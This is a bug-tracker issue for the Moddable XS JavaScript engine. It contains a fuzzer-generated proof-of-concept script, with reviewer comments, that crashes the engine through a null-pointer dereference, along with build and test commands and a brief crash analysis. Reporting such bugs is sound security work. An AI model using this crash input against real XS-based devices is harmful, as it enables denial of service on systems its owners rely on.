Closed
Labels
fixed - please verify: Issue has been fixed. Please verify and close.
Description
Environment
operating system: ubuntu18.04
compile command: cd /pathto/moddable/xs/makefiles/lin
make
test command: ./xst poc
poc:
// PoC helper (fuzzer-generated). Maps over an array-like `v`: any element whose
// first char code is < 32 or > 127, or that equals one of two fixed literals,
// is replaced by that char code wrapped in fixed marker strings; the pieces are
// then joined with '`pv,'. The callback parameter `v` shadows the outer `v`.
// Because the iteration goes through Array.prototype.map.call, `v` need not be
// an array: the callers below pass 100 and null (map.call on null is expected
// to throw a TypeError before the callback ever runs).
function safeEscape(v) {
  return Array.prototype.map.call(v, function (v) {
    if (v.charCodeAt(0) < 32 || v.charCodeAt(0) > 127 || v === '|O@aud' || v === 'v|4QJ#!tYbmHIS') {
      return 'TP4C4Q^5n)|&TPEW&J_sy*9' + v.charCodeAt(0) + 'N39Mrsg';
    }
    return v;
  }).join('`pv,');
}
// PoC driver (fuzzer-generated). For each fixed string it builds a source text
// from a fixed prefix/suffix and passes it to eval(). `res` is declared but
// never assigned, so the store into `res.attrs` cannot succeed (TypeError), and
// the assembled text looks ill-formed as JS anyway (eval would raise a
// SyntaxError); every per-iteration error is swallowed by the empty catch.
// After the loop the function calls itself unconditionally, so the first call
// recurses until the engine reports stack exhaustion; that error propagates to
// the caller.
function stringLiteralTest() {
  [
    'Ma',
    '<c',
    'WF{SXPgj)W72`U',
    'Hr*G7;kSodn|vZt8JH',
    '',
    '_#7whg9RxV$Y7$RY[Aw',
    'u6Rm&NkZOa|$|qwoa+M',
    'X*;H9|jR~EXt(X>j-',
    ']{*(=}XM8^TE&c+',
    'W?`pp]=cR0?y&-SbfB+',
    'Em%{azew3z[$+uCwX~',
    'f?I<9NCA',
    'xpA5pwI*W%',
    '(fOy6l2&+!W',
    '1W^;g6SYH^A5',
    'uj',
    'Xgkv3GAIvs!D#Z,6~1',
    'T1]b!skn`Vn3NGd>',
    '[DAlz)C@ro0&06|[0Gh',
    '~rWK%ewydHbW?',
    '|D,U_%3r;Pwd#JL',
    'Yf-S51M>(if}eAM',
    'DTB5fhqkB/H0Km!Dt0jLPSa',
    'Xz7-}8G-lFU$#SvL',
    'tCoe+[Vxa1AXx',
    'IJfL%@m/',
    '*8O`N2HyOyjFM^1LNeGPT',
    'Pe_D[hm0K94rLIQ8)2x',
    'Cjx5FRs##)(=Z',
    '9pSa(G4e;8%nqdZRZ2dnThB3',
    'mv9{&*DSXp',
    '^,{nl$L;2c8&p,2Ya',
    'fEm)HN(}XJ^sjs*IBO5>-',
    'U3',
    'b%YRFYG;!q',
    'xJz>3_p`9[rv9J2&&1[P#N25',
    'Jq/ujUG8$qc+g#',
    '',
    'H7yUDDI>=K]up[d<B',
    ']',
    'Z5zj6&Tar',
    'o2q#pmH.Ko*J_1j>R9q45',
    '`BhV',
    'p}ATCMxS|,|$Yp5f',
    '4-',
    'p2^WNmR^T?_!pUW',
    '?M?',
    'oSa9;',
    '6j&da-0v',
    ',,OU/K67=u',
    'hpb2T7LHV~c.U2gstS-K/bS',
    'J`G9HjdX*<)2b??]1_h].4',
    'yq3oPgO=W<rG#'
  ].forEach(function (v) {
    var src = '[p9G' + v + '2<kxWr+DZ}q`5W_^|I6Y,^+n';
    var res;
    try {
      // `res` is undefined here, so this assignment throws; which failure
      // surfaces first (the eval or the property store) depends on the
      // engine's evaluation order, and the statements after it never run.
      res.attrs = eval(src);
      var Yfme = Proxy;
      JSON.parse('DCmsg8#gQh[*u');
      var Xprd = new ArrayBuffer(null);
    } catch (e) {
    }
  });
  JSON.stringify('o;ruw~w<q`GX<&g7n*6>s');
  var zRjS = escape('fQrxjM4^U^7nz');
  // Unbounded self-recursion: the call never returns normally. The script is
  // sloppy mode (no 'use strict'), so writing to a string's .length would be a
  // silent no-op even if it did.
  zRjS.length = stringLiteralTest();
}
// First top-level entry point of the PoC: runs the recursive driver once and
// discards whatever it throws (stack exhaustion from the self-call is the
// expected outcome on a conforming engine).
try {
  stringLiteralTest();
} catch (e) {
}
// PoC driver (fuzzer-generated), invoked from the top-level try below.
// Control flow on a conforming engine: safeEscape(100) returns normally, then
// safeEscape(null) throws a TypeError (Array.prototype.map.call on null), which
// leaves the rest of this body unreachable. If an engine does not throw there,
// the unconditional self-call two statements later recurses until the stack is
// exhausted, so nothing past that line runs on the first invocation either.
// NOTE(review): the reporter's crash (rax is 0 while dereferencing rax+0x2) is
// a null-pointer dereference inside the engine; the script itself does not
// show which of these statements triggers it — confirm under a debugger.
function plainEscapeTest() {
  var A = 100;
  var mpYY = Promise;
  var Brjr = safeEscape(A);
  var fyxT = safeEscape(null);   // expected to throw TypeError
  var wstW = Symbol;
  var cWYf = plainEscapeTest();  // unbounded recursion if ever reached
  var dXiE = Symbol;
  var zxAP = JSON.stringify('nSE3wBW,>+se#I)9KuURm!');
  var SwMK = JSON.stringify('');
  var QjrQ = plainEscapeTest();
  var O = {
    o: 123,
    A: 'W4)2'
  };
  // Property write on a primitive string (the function's .name): a silent
  // no-op in sloppy mode.
  (function () {
  }.name['_}'] = 'b#MEG_n>_cw,2~');
  var seph = stringLiteralTest();
  var TNFC = Promise;
  [
    '*m[$okd9{&)hN&2dl&F/DT',
    'NSuexaoL.^1mIw?E{G-&Q',
    'C{',
    '+kAc66?Te5{eNO3',
    'r{pR7V',
    'Th+{|Wd)I$PLxu3lc5[(RoWp',
    '|{1$ML62kcT{a31A=>Q>a]',
    'L5)Wl?h[i}yc^>`x',
    'cXn--r<Mw0rI1Nzu!',
    '}|qfo?{h$Tb_u7#Ur<04|)]',
    'Zw2t*RmhWZj'
  ].forEach(function (v) {
    var src = v;
    var NQcb = Symbol;
    var yBbb = new SharedArrayBuffer(null);
    var AdwZ = DataView;
    var fTQj = Math;
    var ctxG = plainEscapeTest();
    var Grma = stringLiteralTest();
    var daDw = new RegExp('Btj');
    O.A = src.toLocaleUpperCase();
    var rmRB = new ArrayBuffer(null);
    var res;
    var WAJw = null < null;
    var dYwh = Symbol;
    try {
      // Each fixed string is eval'd as-is and the stringified result is
      // written to a function's .name (a no-op in sloppy mode).
      (function () {
      }.name = String(eval(src)));
      // These lookups are string-keyed (".hasInstance", not
      // Symbol.hasInstance), so they yield undefined, which the BigUint64Array
      // constructor cannot convert to a BigInt (TypeError).
      var ppRY = new BigUint64Array([
        function () {
        }.hasInstance,
        function () {
        }.isConcatSpreadable,
        null,
        function () {
        },
        null,
        function () {
        }.toPrimitive,
        function () {
        }.search
      ]);
    } catch (e) {
    }
  });
}
// Second top-level entry point: runs plainEscapeTest and then safeEscape(null)
// inside one try. On a conforming engine the first call already throws, so the
// safeEscape(null) line is never reached; either error is swallowed.
try {
  plainEscapeTest();
  var TtZN = safeEscape(null);
} catch (e) {
}
Vulnerability analysis
We can see that the program tries to access the memory area pointed to by rax+0x2, but the value of rax is 0, i.e. the crash is a null-pointer dereference.